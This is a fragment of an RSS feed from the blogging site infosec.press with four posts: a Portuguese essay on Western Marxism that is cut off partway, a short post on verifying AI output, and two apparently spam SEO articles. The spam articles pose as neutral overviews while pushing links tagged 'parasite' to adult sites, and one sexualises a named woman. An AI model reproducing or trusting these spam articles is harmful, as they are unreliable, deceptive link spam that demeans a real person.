<p>The term “porn comics femboy” has gained significant traction across various online platforms, reflecting a specific niche interest within the broader landscape of digital content consumption. View the source page at tsai-yi.tw (<a href="https://tsai-yi.tw/porn+comics+femboy?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=porn-comics-femboy&amp;utm_content=ptask_mr2a0vhsodt9wd" rel="nofollow">https://tsai-yi.tw/porn+comics+femboy?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=porn-comics-femboy&amp;utm_content=ptask_mr2a0vhsodt9wd</a>) for a comprehensive collection of related material.</p>

<h2 id="background-and-context">Background and Context</h2>

<p>The femboy genre within illustrated comics represents a distinct category that has developed its own following across the internet. Content featuring femboy characters appears across multiple platforms, from dedicated comic hosting sites to fan art communities. Artists contributing to this space include creators such as Red7cat, Dross, and Shadbase, whose works have become reference points within the genre. Series like “Back At The Farm” and “See Ya Later Boi 2” exemplify the ongoing production of content in this category.</p>

<h2 id="online-communities-and-distribution">Online Communities and Distribution</h2>

<p>These comics circulate through various channels including dedicated adult comic platforms, art aggregation sites, and fan communities. The content is typically shared across image hosting services, specialized comic repositories, and social media platforms. Search interest around this topic tends to spike in correlation with new releases from popular artists and the viral spread of specific character designs across fandom networks.</p>

<h2 id="the-digital-landscape">The Digital Landscape</h2>

<p>The demand for femboy-themed illustrated content reflects broader shifts in how niche adult entertainment is produced and consumed online. Independent artists can now distribute their work directly to audiences through subscription platforms and pay-per-view models, bypassing traditional publishing channels. This ecosystem has enabled the growth of a vibrant creative community producing specialized content for dedicated audiences.</p>

<p>For the full collection, visit tsai-yi.tw (<a href="https://tsai-yi.tw/porn+comics+femboy?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=porn-comics-femboy&amp;utm_content=ptask_mr2a0vhsodt9wd" rel="nofollow">https://tsai-yi.tw/porn+comics+femboy?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=porn-comics-femboy&amp;utm_content=ptask_mr2a0vhsodt9wd</a>).</p>
]]></content:encoded>
      <author>Frances Campbell</author>
      <guid>https://infosec.press/read/a/jb2q35x9mu</guid>
      <pubDate>Wed, 01 Jul 2026 16:27:11 +0000</pubDate>
    </item>
    <item>
      <title>Kira Pregiato Big Tits: The Online Personality Behind the Search Trend</title>
      <link>https://infosec.press/stepanarnold49/kira-pregiato-big-tits-the-online-personality-behind-the-search-trend</link>
      <description>&lt;![CDATA[Kira Pregiato Big Tits: The Online Personality Behind the Search Trend&#xA;&#xA;Online content creator Kira Pregiato has become a widely searched name across multiple platforms. View the source page at mamabynature.net for a comprehensive collection of her work. This article provides a neutral overview of her presence on the internet and the attention her content has received.&#xA;&#xA;Kira Pregiato is a social media personality and content creator who has built a notable online following. Her work spans several digital platforms where she shares visual content with her audience. The breadth of her online footprint has made her a recurring subject of search queries across various content discovery platforms.&#xA;&#xA;Background and Online Growth&#xA;&#xA;Pregiato gained visibility through consistent content production across subscription-based platforms and media sharing sites. Her material has been featured on numerous content aggregation websites, reflecting a wide distribution network. According to publicly available information, her online following grew substantially after certain content pieces gained viral traction, reportedly generating significant engagement across platforms.&#xA;&#xA;Her content appears across a variety of hubs including fan galleries, video platforms, and dedicated content libraries. This multi-channel presence contributes to sustained search interest around Kira Pregiato Big Tits content.&#xA;&#xA;Digital Footprint&#xA;&#xA;Pregiato maintains an active presence across multiple content platforms. Her material appears on dedicated fan sites that track popular creators, as well as video sharing platforms and image galleries. This broad distribution means her content reaches audiences through various channels simultaneously, driving ongoing discovery by new viewers.&#xA;&#xA;The Economics of Online Content Creation&#xA;&#xA;The attention surrounding Kira Pregiato reflects broader trends in online content creation. Individual creators can now build substantial audiences through direct-to-consumer platforms, turning online followings into sustainable careers. The case of Pregiato illustrates how viral moments can permanently elevate a creator&#39;s profile.&#xA;&#xA;For the full collection, visit mamabynature.net.]]&gt;</description>
      <content:encoded><![CDATA[<p>Kira Pregiato Big Tits: The Online Personality Behind the Search Trend</p>

<p>Online content creator Kira Pregiato has become a widely searched name across multiple platforms. <a href="https://mamabynature.net/kira+pregiato+big+tits?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=kira-pregiato-big-tits&amp;utm_content=ptask_mr27vpr512nzp4" rel="nofollow">View the source page at mamabynature.net</a> for a comprehensive collection of her work. This article provides a neutral overview of her presence on the internet and the attention her content has received.</p>

<p>Kira Pregiato is a social media personality and content creator who has built a notable online following. Her work spans several digital platforms where she shares visual content with her audience. The breadth of her online footprint has made her a recurring subject of search queries across various content discovery platforms.</p>

<h2 id="background-and-online-growth">Background and Online Growth</h2>

<p>Pregiato gained visibility through consistent content production across subscription-based platforms and media sharing sites. Her material has been featured on numerous content aggregation websites, reflecting a wide distribution network. According to publicly available information, her online following grew substantially after certain content pieces gained viral traction, reportedly generating significant engagement across platforms.</p>

<p>Her content appears across a variety of hubs including fan galleries, video platforms, and dedicated content libraries. This multi-channel presence contributes to sustained search interest around Kira Pregiato Big Tits content.</p>

<h2 id="digital-footprint">Digital Footprint</h2>

<p>Pregiato maintains an active presence across multiple content platforms. Her material appears on dedicated fan sites that track popular creators, as well as video sharing platforms and image galleries. This broad distribution means her content reaches audiences through various channels simultaneously, driving ongoing discovery by new viewers.</p>

<h2 id="the-economics-of-online-content-creation">The Economics of Online Content Creation</h2>

<p>The attention surrounding Kira Pregiato reflects broader trends in online content creation. Individual creators can now build substantial audiences through direct-to-consumer platforms, turning online followings into sustainable careers. The case of Pregiato illustrates how viral moments can permanently elevate a creator&#39;s profile.</p>

<p>For the full collection, visit <a href="https://mamabynature.net/kira+pregiato+big+tits?utm_source=parasite&amp;utm_medium=infosec.press&amp;utm_campaign=kira-pregiato-big-tits&amp;utm_content=ptask_mr27vpr512nzp4" rel="nofollow">mamabynature.net</a>.</p>
]]></content:encoded>
      <author>Frances Campbell</author>
      <guid>https://infosec.press/read/a/xxdg6gadbh</guid>
      <pubDate>Wed, 01 Jul 2026 15:43:13 +0000</pubDate>
    </item>
    <item>
      <title>Why Security Professionals Should Care About AI Workflows</title>
      <link>https://infosec.press/cy520569/why-security-professionals-should-care-about-ai-workflows</link>
      <description>&lt;![CDATA[Artificial intelligence has become part of everyday workflows.&#xA;&#xA;Developers use AI to generate code snippets. Writers use AI to organize ideas. Designers use AI to prototype concepts. Security teams are increasingly encountering AI-generated content in both legitimate and malicious contexts.&#xA;&#xA;The conversation often focuses on whether AI is &#34;good&#34; or &#34;bad.&#34;&#xA;&#xA;I think the more interesting question is different:&#xA;&#xA;How do we integrate AI into our workflows without sacrificing security, privacy, or critical thinking?&#xA;&#xA;AI Is a Tool, Not a Decision Maker&#xA;&#xA;One of the biggest mistakes people make is treating AI output as authoritative.&#xA;&#xA;Large language models can generate convincing explanations that are partially or completely incorrect.&#xA;&#xA;Image and video models can produce realistic content that never existed.&#xA;&#xA;This means that verification becomes more important, not less.&#xA;&#xA;The more capable AI becomes, the more valuable human judgment becomes.&#xA;&#xA;Faster Prototyping Has Security Implications&#xA;&#xA;AI dramatically reduces the cost of experimentation.&#xA;&#xA;A concept that once required hours can often be tested in minutes.&#xA;&#xA;This is useful for defenders and attackers alike.&#xA;&#xA;Security awareness teams can create educational content more quickly.&#xA;&#xA;Researchers can summarize findings faster.&#xA;&#xA;At the same time, threat actors can automate content generation and social engineering at greater scale.&#xA;&#xA;Technology itself remains neutral.&#xA;&#xA;The impact depends on how it is used.&#xA;&#xA;Evaluating AI Tools&#xA;&#xA;When testing any AI platform, I try to ask a few simple questions:&#xA;&#xA;What data is collected?&#xA;How is user content stored?&#xA;Is there transparency around processing?&#xA;Can I verify the generated output?&#xA;Does the tool improve my workflow or simply add complexity?&#xA;&#xA;These questions matter more than feature lists.&#xA;&#xA;A Practical Example&#xA;&#xA;Recently, while exploring AI-assisted content creation, I experimented with Kling 3.0 AI Video Generator.&#xA;&#xA;What interested me most wasn&#39;t the generated video itself, but the speed at which ideas could be transformed into prototypes.&#xA;&#xA;From a security perspective, this reinforces an important lesson: content authenticity can no longer be assumed simply because something looks professional.&#xA;&#xA;Verification must become part of the workflow.&#xA;&#xA;Final Thoughts&#xA;&#xA;AI is not replacing human expertise.&#xA;&#xA;If anything, it is increasing the importance of skepticism, validation, and informed decision-making.&#xA;&#xA;Security professionals have always relied on evidence rather than assumptions.&#xA;&#xA;The same principle applies to AI.&#xA;&#xA;Use the tools.&#xA;&#xA;Experiment with new workflows.&#xA;&#xA;But never stop verifying the results.&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>Artificial intelligence has become part of everyday workflows.</p>

<p>Developers use AI to generate code snippets. Writers use AI to organize ideas. Designers use AI to prototype concepts. Security teams are increasingly encountering AI-generated content in both legitimate and malicious contexts.</p>

<p>The conversation often focuses on whether AI is “good” or “bad.”</p>

<p>I think the more interesting question is different:</p>

<p>How do we integrate AI into our workflows without sacrificing security, privacy, or critical thinking?</p>

<h2 id="ai-is-a-tool-not-a-decision-maker">AI Is a Tool, Not a Decision Maker</h2>

<p>One of the biggest mistakes people make is treating AI output as authoritative.</p>

<p>Large language models can generate convincing explanations that are partially or completely incorrect.</p>

<p>Image and video models can produce realistic content that never existed.</p>

<p>This means that verification becomes more important, not less.</p>

<p>The more capable AI becomes, the more valuable human judgment becomes.</p>

<h2 id="faster-prototyping-has-security-implications">Faster Prototyping Has Security Implications</h2>

<p>AI dramatically reduces the cost of experimentation.</p>

<p>A concept that once required hours can often be tested in minutes.</p>

<p>This is useful for defenders and attackers alike.</p>

<p>Security awareness teams can create educational content more quickly.</p>

<p>Researchers can summarize findings faster.</p>

<p>At the same time, threat actors can automate content generation and social engineering at greater scale.</p>

<p>Technology itself remains neutral.</p>

<p>The impact depends on how it is used.</p>

<h2 id="evaluating-ai-tools">Evaluating AI Tools</h2>

<p>When testing any AI platform, I try to ask a few simple questions:</p>
<ul><li>What data is collected?</li>
<li>How is user content stored?</li>
<li>Is there transparency around processing?</li>
<li>Can I verify the generated output?</li>
<li>Does the tool improve my workflow or simply add complexity?</li></ul>

<p>These questions matter more than feature lists.</p>

<h2 id="a-practical-example">A Practical Example</h2>

<p>Recently, while exploring AI-assisted content creation, I experimented with <a href="https://www.kling3ai.co" rel="nofollow">Kling 3.0 AI Video Generator</a>.</p>

<p>What interested me most wasn&#39;t the generated video itself, but the speed at which ideas could be transformed into prototypes.</p>

<p>From a security perspective, this reinforces an important lesson: content authenticity can no longer be assumed simply because something looks professional.</p>

<p>Verification must become part of the workflow.</p>

<h2 id="final-thoughts">Final Thoughts</h2>

<p>AI is not replacing human expertise.</p>

<p>If anything, it is increasing the importance of skepticism, validation, and informed decision-making.</p>

<p>Security professionals have always relied on evidence rather than assumptions.</p>

<p>The same principle applies to AI.</p>

<p>Use the tools.</p>

<p>Experiment with new workflows.</p>

<p>But never stop verifying the results.</p>
]]></content:encoded>
      <author>cy520569</author>
      <guid>https://infosec.press/read/a/6k0es09pcz</guid>
      <pubDate>Wed, 24 Jun 2026 09:51:02 +0000</pubDate>
    </item>
    <item>
      <title>Ortodoxia Marxista e Ambiguidade Histórica</title>
      <link>https://infosec.press/nomos/ortodoxia-marxista-e-ambiguidade-historica</link>
      <description>&lt;![CDATA[obra de Wantaya Thitipaisal, artista contemporânea tailandesa cuja produção explora temas de percepção, diálogo e ambiguidades da vida social&#xA;!--more--&#xA;Recentemente está rolando um debate contra o chamado &#34;marxismo ocidental&#34; no meio webcomunista. Alguns influenciadores marxista-leninistas ou maoistas tendem a tratar marxismo ocidental como sinônimo de Escola de Frankfurt. Menosprezar a escola de Frankfurt já seria um problema por si só, porque implica descartar autores como Adorno ou Marcuse como se não tivessem nada a oferecer ao pensamento marxista. Mas a simplificação é ainda mais grave.&#xA;&#xA;O marxismo ocidental nunca foi apenas a Escola de Frankfurt. Nele encontramos autores tão diversos quanto Lukács, Gramsci, Korsch, Sartre, Merleau-Ponty, até Althusser e Poulantzas, e vários outros que procuraram recuperar aspectos da dialética de Marx que haviam sido empobrecidos pelas leituras mais ortodoxas do marxismo do século XX (cada um ao seu próprio jeito e de formas diferentes). Reduzir toda essa tradição a uma caricatura &#34;identitária&#34;, &#34;culturalista&#34; ou &#34;acadêmica&#34; é demonstrar desconhecimento da própria história do pensamento marxista.&#xA;&#xA;É inclusive irônico porque se nem mesmo os autores da escola de Frankfurt são totalmente coesos e concordam entre si, quando ampliamos para o “marxismo ocidental” fica pior ainda, pois há autores que tecem várias críticas e discordam em vários aspectos entre si. Uma categoria criada para descrever uma tradição intelectual extremamente diversa acaba sendo utilizada por alguns influenciadores como instrumento de demarcação ideológica, criando um “nós” e um “outros” dentro do próprio marxismo, transformando em suspeitos todos aqueles que se recusam a identificar marxismo com a ortodoxia soviética ou maoista.&#xA;&#xA;Parte do problema está na transformação de Materialismo e Empiriocriticismo, de Lenin, em uma espécie de catecismo filosófico. Muitos marxistas heterodoxos viram nessa obra um retorno a formas de materialismo anteriores não apenas a Marx, mas também à revolução filosófica promovida por Kant e Hegel. O conhecimento aparece ali como um espelhamento cada vez mais preciso de uma realidade objetiva, e o marxismo tende a ser apresentado como a ciência capaz de revelar as leis fundamentais da história.&#xA;&#xA;A partir daí, não é difícil incorrer numa visão mecanicista do devir histórico, na qual o futuro já estaria inscrito nas estruturas do presente e a vitória do proletariado apareceria não como uma possibilidade política a ser construída mas como o desfecho inevitável de um processo governado por leis históricas.&#xA;&#xA;Mais tarde, nos Cadernos Filosóficos, Lenin realiza uma retomada muito mais rica da dialética hegeliana que se afasta significativamente do mecanicismo presente em Materialismo e Empiriocriticismo. O problema é que a tradição marxista-leninista posterior frequentemente combinou esse reencontro com Hegel a uma filosofia da história excessivamente confiante em suas próprias conclusões. A dialética deixou de ser um método para compreender contradições abertas e passou a funcionar, muitas vezes, como garantia antecipada do triunfo histórico do proletariado.&#xA;&#xA;É justamente contra essa tentação que boa parte do marxismo ocidental se insurgiu. Lukács, Gramsci, Sartre, Merleau-Ponty e mesmo autores da Escola de Frankfurt insistiram, cada um à sua maneira, que a história não entrega garantias antecipadas. A práxis política ocorre em um mundo contingente, ambíguo e imprevisível. Não existe ponto de vista privilegiado fora da história a partir do qual possamos enxergar seu destino final.&#xA;&#xA;Talvez seja exatamente isso que incomode tanto certos setores do webcomunismo. A ideia de que a política exige julgamento, revisão constante dos próprios pressupostos e responsabilidade pelos resultados concretos da ação é muito menos confortável do que a crença de estar marchando inevitavelmente em direção a uma vitória já inscrita nas leis da história. A primeira posição exige reflexão crítica permanente e a segunda oferece a segurança psicológica da certeza doutrinária.&#xA;&#xA;O &#34;marxismo ocidental&#34; vira sinônimo de &#34;desvio burguês/acadêmico&#34; para que a ortodoxia não precise lidar com questões difíceis.&#xA;&#xA;Para Marx, como se pode observar inclusive nesse vídeo do Gustavo Machado, a “totalidade” dialética não é um molde pronto, que você aplica à realidade, para explicá-la à força, é um horizonte que se reconstrói na busca por compreender a síntese de múltiplas determinações em movimento e serve para nos lembrar de olhar para as conexões ocultas e para o movimento do real, não para engessar o mundo em uma verdade imutável.&#xA;&#xA;Minha preocupação é que essa deturpação produza militantes mais preocupados em defender verdades prontas do que em compreender a realidade concreta. Isso, na história, pode até ter se mostrado uma potência para comover as pessoas a fazer revolução, guerra e matar com convicção, como um meio justificado para se atingir esse fim histórico glorioso e inevitável. Mas a dialética de Marx é muito mais que colocar a dialética de Hegel de cabeça para baixo. A dialética marxista não possui a confiança hegeliana de que a história possa encontrar sua reconciliação final em uma totalidade plenamente realizada.&#xA;&#xA;Formar pessoas politicamente nesses moldes cria pessoas impermeáveis à experiência, guiadas por uma paixão de nostalgia dessa totalidade absoluta e já conquistada, tornando-as incapazes de refletir sobre suas práticas e ações políticas. Sobre isso, deixo o que considero uma avaliação brilhante de Sartre sobre esse tipo de pessoa, que no caso foi associado ao antissemita, ao fascista, mas também se aplica a fundamentalistas de qualquer espectro político:&#xA;&#xA;  O homem sensato busca gemendo, sabe que seus raciocínios são apenas prováveis, que outras considerações hão de pô-los em dúvida; nunca sabe muito bem onde vai; está &#34;aberto&#34;, pode passar por vacilante. Mas há pessoas que se sentem atraídas pela permanência da pedra. Querem ser maciças e impenetráveis, não querem mudar: aonde as conduzirá a mudança? Trata-se de um temor original de si próprio e de um temor da verdade. E o que as amedronta, não é o conteúdo da verdade, que nem sequer suspeitam, porém a própria forma do verdadeiro, este objeto de indefinida aproximação. É como se suas próprias existências estivessem eternamente em sursis. Mas desejam existir ao mesmo tempo e incontinenti. Não desejam opiniões adquiridas, querem-nas inatas; como têm medo do raciocínio, querem adotar um modo de vida em que o raciocínio e a busca exerçam tão somente um papel subordinado, em que jamais se procure exceto aquilo que já se encontrou, em que a gente só se torne aquilo que já era. E para tanto só há a paixão. Apenas uma forte prevenção sentimental pode dar uma certeza fulgurante, apenas ela pode manter o raciocínio à margem, apenas ela pode permanecer impermeável à experiência e subsistir durante toda uma vida.&#xA;&#xA;Essa paixão doutrinária mais parece um escudo dogmático, prevenindo práticas, investigações e até material reflexivo que contradiga o marxismo adotado como canônico: se a realidade contradiz a linha do partido ou a “lei histórica”, pior para a realidade!&#xA;&#xA;Se você se interessa pelo marxismo, se se compreende como socialista ou comunista, meu conselho é que não limite seu horizonte de percepção. Não exclua de sua vida fontes literárias tratadas como não oficiais. Ninguém vai tomar sua carteirinha de marxista porque você decidiu ampliar seus estudos. Recomendo que leia autores do marxismo seja ocidental, soviético, oriental, inclusive não apenas os marxistas, leia inclusive filósofos e autores não-marxistas, tudo o que permita que você amplie seus horizontes.&#xA;&#xA;As obras de Marx estão repletas de textos literários de Honoré de Balzac. Marx adorava Balzac. Embora fosse politicamente conservador, monarquista e profundamente nostálgico da aristocracia francesa, conseguiu retratar as transformações sociais de seu tempo com uma profundidade que o próprio Marx admirava.&#xA;&#xA;Merleau-Ponty, em “As Aventuras da Dialética”, ao resgatar o conceito de totalidade no jovem Lukács, constata que mesmo as distorções ideológicas revelam o real:&#xA;&#xA;  Até mesmo os fantasmas têm um significado e exigem interpretação, pois sempre aparecem no contexto de uma relação vivida com a realidade social e, portanto, não são coisas mentais e opacas, separadas do resto. Ao contrário, como as expressões faciais ou a fala, carregam consigo um significado oculto que os desmascara; não escondem algo a menos que o revelem.&#xA;&#xA;e&#xA;&#xA;  a literatura nunca expressa os postulados de uma única classe, mas sim o encontro e, se necessário, o contraste com os outros: é, portanto, sempre um reflexo do todo, mesmo que a perspectiva de classe a distorça.&#xA;&#xA;Merleau-Ponty e Lukács (pelo menos o de 1923, do História e Consciência de Classe), concordam que a dialética histórica não é impermeável à experiência. Nenhuma experiência histórica deve ser descartada de antemão por razões doutrinárias. Até os erros e derrotas precisam ser compreendidos como momentos do processo histórico: &#34;O falso é um momento do verdadeiro, simultaneamente falso e não falso.&#34;&#xA;&#xA;Essa atenção a experiência permite que o Marxismo seja plural e atento às conjunturas e movimentos sociais distintos. Não concordo com o uso do marxismo soviético como receituário do marxismo para o contexto histórico do Brasil atual… Isso é antimarxista em alguma medida, visto que Marx, no 18 Brumário, já explicava que não devemos conjurar espíritos do passado a fim de encenar um momento distinto da história venerando revolucionários do passado como se tivessem uma receita pronta e acabada:&#xA;&#xA;  Os homens fazem a sua própria história, mas não a fazem por livre vontade; não a fazem sob circunstâncias de sua escolha, e sim sob aquelas com as quais se defrontam diretamente, legadas e transmitidas pelo passado. A tradição de todas as gerações mortas oprime como um pesadelo o cérebro dos vivos. E justamente quando parecem empenhados em revolucionar a si mesmos e às coisas, em criar algo que jamais existiu, precisamente nesses períodos de crise revolucionária, eles conjuram ansiosamente em seu auxílio os espíritos do passado, tomando-lhes emprestados os nomes, os gritos de guerra e as roupagens, a fim de encenar a nova cena da história mundial nesse disfarce venerável e nessa linguagem emprestada.&#xA;&#xA;Sei que soa muito mais fácil angariar uma militância engajada a dotando de certezas… É realmente mais difícil convidar pessoas a fazer uma revolução falando: “Vamos nos unir para construir o novo, o futuro é incerto, nossa vitória não está garantida, mas vale a pena o risco por essa causa”, mas dentro de uma análise concreta dos movimentos reais da história, é isso o que temos. O sistema que durante décadas se apresentou como a realização histórica inevitável do marxismo acabou implodindo por dentro. A União Soviética se dividiu e a Rússia foi revertida à economia de mercado de uma forma repentina, traumática, que causou danos relevantes ao seu tecido social e a de parceiros, como Cuba.&#xA;&#xA;A China caminhou para uma forma peculiar de capitalismo de Estado ou, para seus defensores, de socialismo de mercado, na qual coexistem planejamento estatal, grandes empresas públicas e uma poderosa classe capitalista privada (inclusive com uma expressiva classe de bilionários privados operando segundo as dinâmicas tradicionais da acumulação capitalista). A classe gerencial chinesa, a burocracia estatal, tem mais autonomia em relação a classe dominante capitalista e maior capacidade de planejamento, de coordenar o desenvolvimento estratégico do País, em relação a todos os outros estados-nações sob o modo de produção capitalista.&#xA;&#xA;O que eu poderia dizer para o marxismo das possibilidades, é que embora o socialismo não seja uma certeza histórica, seja uma possibilidade, mesmo que experiências socialistas plurais, prolíficas e diferenciadas marxistas sejam derrotadas, o empenho da militância em criar o novo não é em vão.&#xA;&#xA;Um humilde exemplo que sempre ofereço e tento lembrar, que escapa totalmente do marxismo soviético canônico, é a da pequena municipalidade da Viena Vermelha no período entre Guerras, como consta do Livro V, da história do Marxismo, de Hobsbawm.&#xA;&#xA;Os austromarxistas fizeram uma leitura brilhante de seu contexto histórico e das possibilidades políticas que se abriam com a recente ampliação do sufrágio. Por meio das vias eleitorais, conquistaram o governo municipal de Viena e desenvolveram uma forma criativa de gestão socialista que transformou profundamente a cidade. A tributação progressiva e os programas sociais ergueram, em pouco mais de uma década, durante o período entre guerras, um verdadeiro monumento ao socialismo democrático.&#xA;&#xA;Milhares de trabalhadores foram retirados de cortiços insalubres e passaram a ter acesso a moradias de qualidade inédita para a época. Conjuntos habitacionais como o Karl-Marx-Hof permanecem de pé e continuam cumprindo sua função social até hoje. Ao mesmo tempo, a Viena Vermelha expandiu o acesso à saúde pública, às creches, à educação e a diversas outras políticas sociais, antecipando iniciativas que mais tarde se difundiriam por diferentes países europeus.&#xA;&#xA;Após a derrota da experiência austromarxista diante do avanço do austrofascismo, e depois da anexação da Áustria pelo nazismo, muitos poderiam imaginar que aquela experiência havia desaparecido completamente da história. No entanto, após a derrota do regime nazista, a Constituição austríaca (cuja elaboração contou também com a participação dos austromarxistas) foi restabelecida, e muitas das instituições, políticas públicas e conquistas sociais da Viena Vermelha continuaram presentes na vida urbana vienense.&#xA;&#xA;A experiência da Viena Vermelha tornou-se uma importante referência para diversas políticas sociais implementadas na Europa do pós-guerra, especialmente nas áreas de habitação, saúde e planejamento urbano.&#xA;&#xA;A história não precisa garantir o triunfo inevitável do socialismo para que a luta por transformações sociais valha a pena. O simples fato de que algo novo possa surgir, alterar a experiência humana e permanecer vivo para além de seus criadores já é razão suficiente para agir.&#xA;&#xA;#Marxismo #Dialética #MarxismoOcidental #Filosofia #História #MaterialismoHistórico]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://static.bangkokpost.com/media/content/20230816/c1_2630395_230816062328_1200.jpg" alt="obra de Wantaya Thitipaisal, artista contemporânea tailandesa cuja produção explora temas de percepção, diálogo e ambiguidades da vida social">

Recentemente está rolando um debate contra o chamado “marxismo ocidental” no meio <a href="https://www.youtube.com/watch?v=sJazCh8Ed0M" rel="nofollow">webcomunista</a>. Alguns influenciadores marxista-leninistas ou maoistas tendem a tratar marxismo ocidental como sinônimo de Escola de Frankfurt. Menosprezar a escola de Frankfurt já seria um problema por si só, porque implica descartar autores como Adorno ou Marcuse como se não tivessem nada a oferecer ao pensamento marxista. Mas a simplificação é ainda mais grave.</p>

<p>O marxismo ocidental nunca foi apenas a Escola de Frankfurt. Nele encontramos autores tão diversos quanto Lukács, Gramsci, Korsch, Sartre, Merleau-Ponty, até Althusser e Poulantzas, e vários outros que procuraram recuperar aspectos da dialética de Marx que haviam sido empobrecidos pelas leituras mais ortodoxas do marxismo do século XX (cada um ao seu próprio jeito e de formas diferentes). Reduzir toda essa tradição a uma caricatura “identitária”, “culturalista” ou “acadêmica” é demonstrar desconhecimento da própria história do pensamento marxista.</p>

<p>É inclusive irônico porque se nem mesmo os autores da escola de Frankfurt são totalmente coesos e concordam entre si, quando ampliamos para o “marxismo ocidental” fica pior ainda, pois há autores que tecem várias críticas e discordam em vários aspectos entre si. Uma categoria criada para descrever uma tradição intelectual extremamente diversa acaba sendo utilizada por alguns influenciadores como instrumento de demarcação ideológica, criando um “nós” e um “outros” dentro do próprio marxismo, transformando em suspeitos todos aqueles que se recusam a identificar marxismo com a ortodoxia soviética ou maoista.</p>

<p>Parte do problema está na transformação de Materialismo e Empiriocriticismo, de Lenin, em uma espécie de catecismo filosófico. Muitos marxistas heterodoxos viram nessa obra um retorno a formas de materialismo anteriores não apenas a Marx, mas também à revolução filosófica promovida por Kant e Hegel. O conhecimento aparece ali como um espelhamento cada vez mais preciso de uma realidade objetiva, e o marxismo tende a ser apresentado como a ciência capaz de revelar as leis fundamentais da história.</p>

<p>A partir daí, não é difícil incorrer numa visão mecanicista do devir histórico, na qual o futuro já estaria inscrito nas estruturas do presente e a vitória do proletariado apareceria não como uma possibilidade política a ser construída mas como o desfecho inevitável de um processo governado por leis históricas.</p>

<p>Mais tarde, nos Cadernos Filosóficos, Lenin realiza uma retomada muito mais rica da dialética hegeliana que se afasta significativamente do mecanicismo presente em Materialismo e Empiriocriticismo. O problema é que a tradição marxista-leninista posterior frequentemente combinou esse reencontro com Hegel a uma filosofia da história excessivamente confiante em suas próprias conclusões. A dialética deixou de ser um método para compreender contradições abertas e passou a funcionar, muitas vezes, como garantia antecipada do triunfo histórico do proletariado.</p>

<p>É justamente contra essa tentação que boa parte do marxismo ocidental se insurgiu. Lukács, Gramsci, Sartre, Merleau-Ponty e mesmo autores da Escola de Frankfurt insistiram, cada um à sua maneira, que a história não entrega garantias antecipadas. A práxis política ocorre em um mundo contingente, ambíguo e imprevisível. Não existe ponto de vista privilegiado fora da história a partir do qual possamos enxergar seu destino final.</p>

<p>Talvez seja exatamente isso que incomode tanto certos setores do webcomunismo. A ideia de que a política exige julgamento, revisão constante dos próprios pressupostos e responsabilidade pelos resultados concretos da ação é muito menos confortável do que a crença de estar marchando inevitavelmente em direção a uma vitória já inscrita nas leis da história. A primeira posição exige reflexão crítica permanente e a segunda oferece a segurança psicológica da certeza doutrinária.</p>

<p>O “marxismo ocidental” vira sinônimo de “desvio burguês/acadêmico” para que a ortodoxia não precise lidar com questões difíceis.</p>

<p>Para Marx, como se pode observar inclusive nesse vídeo do <a href="https://www.youtube.com/watch?v=1kcnVAN1W2U" rel="nofollow">Gustavo Machado</a>, a “totalidade” dialética não é um molde pronto, que você aplica à realidade, para explicá-la à força, é um horizonte que se reconstrói na busca por compreender a síntese de múltiplas determinações em movimento e serve para nos lembrar de olhar para as conexões ocultas e para o movimento do real, não para engessar o mundo em uma verdade imutável.</p>

<p>Minha preocupação é que essa deturpação produza militantes mais preocupados em defender verdades prontas do que em compreender a realidade concreta. Isso, na história, pode até ter se mostrado uma potência para comover as pessoas a fazer revolução, guerra e matar com convicção, como um meio justificado para se atingir esse fim histórico glorioso e inevitável. Mas a dialética de Marx é muito mais que colocar a dialética de Hegel de cabeça para baixo. A dialética marxista não possui a confiança hegeliana de que a história possa encontrar sua reconciliação final em uma totalidade plenamente realizada.</p>

<p>Formar pessoas politicamente nesses moldes cria pessoas impermeáveis à experiência, guiadas por uma paixão de nostalgia dessa totalidade absoluta e já conquistada, tornando-as incapazes de refletir sobre suas práticas e ações políticas. Sobre isso, deixo o que considero uma avaliação brilhante de Sartre sobre esse tipo de pessoa, que no caso foi associado ao antissemita, ao fascista, mas também se aplica a fundamentalistas de qualquer espectro político:</p>

<blockquote><p>O homem sensato busca gemendo, sabe que seus raciocínios são apenas prováveis, que outras considerações hão de pô-los em dúvida; nunca sabe muito bem onde vai; está “aberto”, pode passar por vacilante. Mas há pessoas que se sentem atraídas pela permanência da pedra. Querem ser maciças e impenetráveis, não querem mudar: aonde as conduzirá a mudança? Trata-se de um temor original de si próprio e de um temor da verdade. E o que as amedronta, não é o conteúdo da verdade, que nem sequer suspeitam, porém a própria forma do verdadeiro, este objeto de indefinida aproximação. É como se suas próprias existências estivessem eternamente em sursis. Mas desejam existir ao mesmo tempo e incontinenti. Não desejam opiniões adquiridas, querem-nas inatas; como têm medo do raciocínio, querem adotar um modo de vida em que o raciocínio e a busca exerçam tão somente um papel subordinado, em que jamais se procure exceto aquilo que já se encontrou, em que a gente só se torne aquilo que já era. E para tanto só há a paixão. Apenas uma forte prevenção sentimental pode dar uma certeza fulgurante, apenas ela pode manter o raciocínio à margem, apenas ela pode permanecer impermeável à experiência e subsistir durante toda uma vida.</p></blockquote>

<p>Essa paixão doutrinária mais parece um escudo dogmático, prevenindo práticas, investigações e até material reflexivo que contradiga o marxismo adotado como canônico: se a realidade contradiz a linha do partido ou a “lei histórica”, pior para a realidade!</p>

<p>Se você se interessa pelo marxismo, se se compreende como socialista ou comunista, meu conselho é que não limite seu horizonte de percepção. Não exclua de sua vida fontes literárias tratadas como não oficiais. Ninguém vai tomar sua carteirinha de marxista porque você decidiu ampliar seus estudos. Recomendo que leia autores do marxismo seja ocidental, soviético, oriental, inclusive não apenas os marxistas, leia inclusive filósofos e autores não-marxistas, tudo o que permita que você amplie seus horizontes.</p>

<p>As obras de Marx estão repletas de textos literários de Honoré de Balzac. Marx adorava Balzac. Embora fosse politicamente conservador, monarquista e profundamente nostálgico da aristocracia francesa, conseguiu retratar as transformações sociais de seu tempo com uma profundidade que o próprio Marx admirava.</p>

<p>Merleau-Ponty, em “As Aventuras da Dialética”, ao resgatar o conceito de totalidade no jovem Lukács, constata que mesmo as distorções ideológicas revelam o real:</p>

